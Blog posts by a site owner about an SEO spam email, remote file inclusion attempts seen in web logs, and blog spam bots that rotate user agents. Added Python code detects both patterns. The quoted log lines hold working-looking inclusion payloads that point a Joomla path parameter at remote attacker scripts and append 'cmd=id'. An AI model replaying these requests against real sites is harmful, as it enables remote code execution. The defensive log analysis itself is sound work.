A customer of mine recently received the following spam…

Amazingly, considering that they promise worldwide search engine optimization, Dr. Marc Schneider and his company, Global Vibration Inc., can only be found mentioned on sites relating to spamming.

I am Dr. Marc Schneider and I work for Global Vibration Inc. in Washington DC ( Tel: 1 202-787-3989 ) - I would like to speak with the person in charge of your international clientele. Who is my contact? Who should I speak to??

In fact, after visiting http://www.myclients.web.site.co.uk, I have noticed that your website cannot be found on foreign search engines (I tested it on Hispanic search engines, German search engines, Asian search engines, etc.) Our company is specialized in multilingual search engine promotions in 28 languages . From the Japanese Google to the German Yahoo, from the AOL in Spanish to the MSN in Chinese, we can show you how to develop a true international online presence by promoting your website on foreign search engines.

Let us show you how to develop a presence on the multilingual web without having to translate your website: It is not necessary to translate your website in order to submit to foreign search engines, however, you need to have at least 1 page in Japanese optimized with Japanese keywords and meta tags in order to submit to Japanese search engines, at least 1 page in Spanish optimized with Spanish keywords in order to submit to Hispanic search engines and so on…

I strongly suggest that you watch our online presentation which will explains clearly how to get top rankings on foreign search engines with only 1 entry page per language (click on the following link or copy-paste it into your web browser): http://www.mplw.net/demo

From the Japanese Google to the German Yahoo, from the AOL in Spanish to the MSN in Chinese, get users to find your website when searching with YOUR KEYWORDS in their Native language.

Please call me at 1 (202)-787-3989 or email me and let’s work on giving your website the true international exposure which it deserves to have with foreign native online users!!

Regards,

Marc Schneider, Ph.D.
Marcs@mplw.net
_____________________

GLOBAL VIBRATION INC.
1250 Connecticut Ave N.W. Suite 200
Washington, DC 20036 USA
TEL:1 (202)-787-3989 - FAX: 1 (202)-318-4779
http://www.mplw.net :
Multilingual Search Engine Promotion Services since 1999.

They don’t seem to have a presence at all on Japanese Google.

They claim to have been doing Multilingual Search Engine Promotion Services (SEO) since 1999, but a whois query of their domain mplw.net shows a creation date of 04 Aug 2007 16:13:29

Many other companies are receiving the same spam; for example, see http://www.tmcowners.com

For such a multi-nationally aware company, sending spam to the UK, Global Vibration Inc. haven’t even been capable of putting their own phone number in the standard international format, presumably because they are not aware that anyone outside the USA has to dial an international number to reach them.

Associated with their domains are the following administrative email addresses


I saw a couple of entries in the logs that looked like similar attempts to deface the site as seen in the article Script Kiddies 2; however, they seem either different or more sophisticated.


After the mention in Script Kiddies 2 and being given a report that one of their account holders has put up a site defacing script, the free hosting site phpnet.us cancelled the damaging account.
It is a real pity that so many of their competitors do not act equally responsibly.


The logs showed up another attempted exploit, very similar to the one in New Hack Attempt.

88.242.239.182 - - [27/May/2007:18:40:29 +0100] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://xyu.phpnet.us/xyu.dat?&list=1&cmd=id HTTP/1.0" 403 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

phpnet.us, which provides the hosting, does not give a direct way for unregistered users to contact them regarding abuse, but I have used the registered email address at hostorgadmin@googlemail.com to let phpnet.us know that their service is being used by script kiddies.

The originating IP address belongs to the familiar TurkTelekom, who seem to have become the home of some script kiddies.

inetnum: 88.242.64.0 - 88.242.255.255
netname: TurkTelekom
descr: TT ADSL-alcatel dynamic_aci

As usual, their abuse account bounced the complaint.
It looks like another of their IP ranges will have to be blocked.


The following hack attempt appeared in the dragonthoughts logs yesterday.

88.233.150.109 - - [21/May/2007:21:39:02 +0100] "GET /index.php?mosConfig_absolute_path=http://genchackers.net/tool20.dat?&list=1&cmd=id HTTP/1.0" 403 283 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Presumably it is a script kiddy, who has no idea how old the exploit is, but these reports of a year ago will provide an idea:

The listed abuse reporting email address bounced my complaint, for the originator’s IP range 88.233.0.0 - 88.233.255.255

netname: TurkTelekom
descr: TT ADSL-alcatel_gay

So, all of its IP ranges will have their access blocked.

As will the range 212.175.205.0 - 212.175.205.255, which is hosting genchackers.net.

The hacker script that is hosted at genchackers.net was ripped off from http://georgiaeliteallstars.com although they seem to have taken the script down now.

As it stands, the script can’t work for the kiddie that downloaded it, but I don’t think it is appropriate or ethical to explain how to fix it!
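Both log entries above share one signature: a query parameter (here mosConfig_absolute_path) whose value is a URL on another host. The following added example, which is not part of the original posts, scans combined-format access-log lines for that pattern and separates refused requests from served ones; the sample lines, IP addresses and the host remote.example are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format:
# host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)'
    r'[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)
# A parameter value that starts with a URL scheme points the application at another host.
REMOTE_URL = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/May/2007:21:39:02 +0100] "GET /index.php?'
    'mosConfig_absolute_path=http://remote.example/tool.dat?&list=1&cmd=id'
    ' HTTP/1.0" 403 283 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"',
    '198.51.100.9 - - [22/May/2007:03:10:44 +0100] "GET /index.php?'
    'mosConfig_absolute_path=http%3A%2F%2Fremote.example%2Ftool.dat'
    ' HTTP/1.0" 200 5120 "-" "-"',
    '192.0.2.10 - - [22/May/2007:09:00:01 +0100] "GET /blog/?p=13&s=http'
    ' HTTP/1.1" 200 9000 "-" "Mozilla/5.0 (X11; U; Linux i686)"',
]

def find_remote_includes(lines):
    """Return one dict per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes, so encoded values are compared in clear form
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append({"ip": m["ip"], "status": int(m["status"]),
                             "path": parts.path, "param": name, "value": value})
    return hits

def served(hits):
    """Hits the server did not refuse (status below 400): check these first."""
    return [h for h in hits if h["status"] < 400]

if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG):
        flag = "SERVED" if hit["status"] < 400 else "denied"
        print(flag, hit["ip"], hit["path"], hit["param"], hit["value"])
```

A 403 like the ones logged above means the request was refused; any hit returned by served() deserves a look at the application behind that path.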


Over the last couple of days, the blog spammers have been trying to comment on the Japanese interest rate changes.

Various IP addresses are being used, which suggests a botnet, but as they are all trying to push links on the same page to the same sexually explicit, and probably illegal sites, it is fair to assume that they are linked.

The IP addresses of these attacks so far are:


Additional compromised IP addresses which try to add their spam to the Japanese interest rate article for 24th April 2007



A blog spammer has recently been trying to leave its rubbish on this site. Interestingly, each time it was denied, it tried again pretending to be a different user agent, without any repeats.

Access from the same IP address (64.28.178.66) repeatedly tries to access random blog pages, some of which don’t even exist.

Here’s an extract from the log…

64.28.178.66 - - [10/Oct/2006:20:17:50 +0100] "GET /blog/?p=13 HTTP/1.1" 403 279 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; SV1; .NET CLR 1.1.4322)"
64.28.178.66 - - [10/Oct/2006:20:37:34 +0100] "GET /blog/?p=21 HTTP/1.1" 403 279 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1"
64.28.178.66 - - [10/Oct/2006:21:52:26 +0100] "GET /blog/?p=6 HTTP/1.1" 403 279 "-" "EVE-minibrowser/"
64.28.178.66 - - [10/Oct/2006:22:16:38 +0100] "GET /blog/?p=14 HTTP/1.1" 403 279 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5"
64.28.178.66 - - [10/Oct/2006:22:22:55 +0100] "GET /blog/?p=11 HTTP/1.1" 403 279 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)"
64.28.178.66 - - [10/Oct/2006:22:53:52 +0100] "GET /blog/?p=34 HTTP/1.1" 403 279 "-" "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)"
64.28.178.66 - - [10/Oct/2006:22:54:48 +0100] "GET /blog/?p=22 HTTP/1.1" 403 279 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Maxthon; iOpus-I-M; SV1; .NET CLR 1.1.4322)"
64.28.178.66 - - [11/Oct/2006:00:34:53 +0100] "GET /blog/index.php?p=30 HTTP/1.1" 403 288 "-" "OmniExplorer_Bot/3.11c (+http://www.omni-explorer.com) WorldIndexer"
64.28.178.66 - - [11/Oct/2006:01:29:30 +0100] "GET /blog/index.php?p=30 HTTP/1.1" 403 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; [eburo v1.3]; .NET CLR 1.1.4322)"
64.28.178.66 - - [11/Oct/2006:01:31:14 +0100] "GET /blog/?p=10 HTTP/1.1" 403 279 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)"
64.28.178.66 - - [11/Oct/2006:03:09:43 +0100] "GET /blog/?p=18 HTTP/1.1" 403 279 "-" "Mozilla/4.0 (firatnyvr; MSIE 6.0; ; SV1)"
64.28.178.66 - - [11/Oct/2006:04:50:30 +0100] "GET /blog/?p=14 HTTP/1.1" 403 279 "-" "OmniExplorer_Bot/3.11c (+http://www.omni-explorer.com) WorldIndexer"
64.28.178.66 - - [11/Oct/2006:12:01:03 +0100] "GET /blog/?p=13 HTTP/1.1" 403 279 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041116 Firefox/1.0 (Ubuntu) (Ubuntu package 1.0-2ubuntu3)"
64.28.178.66 - - [11/Oct/2006:12:18:56 +0100] "GET /blog/?p=21 HTTP/1.1" 403 279 "-" "Mozilla/4.0 (cOsmO&SoNnE; MSIE 6.0; Windows XP)"
64.28.178.66 - - [11/Oct/2006:13:33:53 +0100] "GET /blog/?p=6 HTTP/1.1" 403 279 "-" "LinkWalker"
64.28.178.66 - - [11/Oct/2006:13:57:28 +0100] "GET /blog/?p=14 HTTP/1.1" 403 279 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)"
64.28.178.66 - - [11/Oct/2006:14:04:21 +0100] "GET /blog/?p=11 HTTP/1.1" 403 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firechicken/1.0"
64.28.178.66 - - [11/Oct/2006:16:39:33 +0100] "GET /blog/?p=2 HTTP/1.1" 403 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"

Does anyone know anything about this outfit?
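The pattern in the extract above, one address presenting a new User-Agent after each refusal, can be picked out of a log automatically. The following is an added example, not part of the original post: it counts distinct User-Agent strings on refused (403) requests per client; the sample lines, IP addresses, the ExampleCrawler agent and both thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

# Pull only client IP, status and the last quoted field (User-Agent)
# from a combined-format log line.
LINE_RE = re.compile(r'^(\S+) .*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

def make_line(ip, hhmm, status, agent):
    """Build a constructed combined-format log line for the sample below."""
    return (f'{ip} - - [10/Oct/2006:{hhmm}:00 +0100] "GET /blog/?p=13 HTTP/1.1" '
            f'{status} 279 "-" "{agent}"')

# Constructed sample: one client changing agent after refusals, one refused
# crawler that keeps its name, one ordinary reader.
SAMPLE_LOG = [
    make_line("203.0.113.66", "20:17", 403, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"),
    make_line("192.0.2.10", "20:20", 200, "Mozilla/5.0 (X11; U; Linux i686) Firefox/1.5"),
    make_line("203.0.113.66", "20:37", 403, "Mozilla/5.0 (Windows; U; Win98) Firefox/1.0.1"),
    make_line("198.51.100.20", "20:40", 403, "ExampleCrawler/1.0"),
    make_line("203.0.113.66", "21:52", 403, "LinkWalker"),
    make_line("198.51.100.20", "21:55", 403, "ExampleCrawler/1.0"),
    make_line("203.0.113.66", "22:16", 403, "Mozilla/5.0 (Macintosh; U; PPC Mac OS X) Safari/412.5"),
    make_line("203.0.113.66", "22:22", 403, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"),
    make_line("192.0.2.10", "22:30", 200, "Mozilla/5.0 (X11; U; Linux i686) Firefox/1.5"),
]

def agent_rotation(lines, min_agents=3, min_ratio=0.5):
    """Return {ip: (denied_requests, distinct_agents)} for clients whose refused
    requests carried at least min_agents different User-Agent strings, with
    distinct/denied at or above min_ratio."""
    denied = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m and m.group(2) == "403":
            denied[m.group(1)].append(m.group(3))
    report = {}
    for ip, agents in denied.items():
        distinct = len(set(agents))
        if distinct >= min_agents and distinct / len(agents) >= min_ratio:
            report[ip] = (len(agents), distinct)
    return report

if __name__ == "__main__":
    for ip, (requests, agents) in agent_rotation(SAMPLE_LOG).items():
        print(f"{ip}: {agents} different agents over {requests} refused requests")
```

The ratio test keeps a shared proxy or NAT address, which may be refused many times under only a few agents, from being reported alongside a single rotating client.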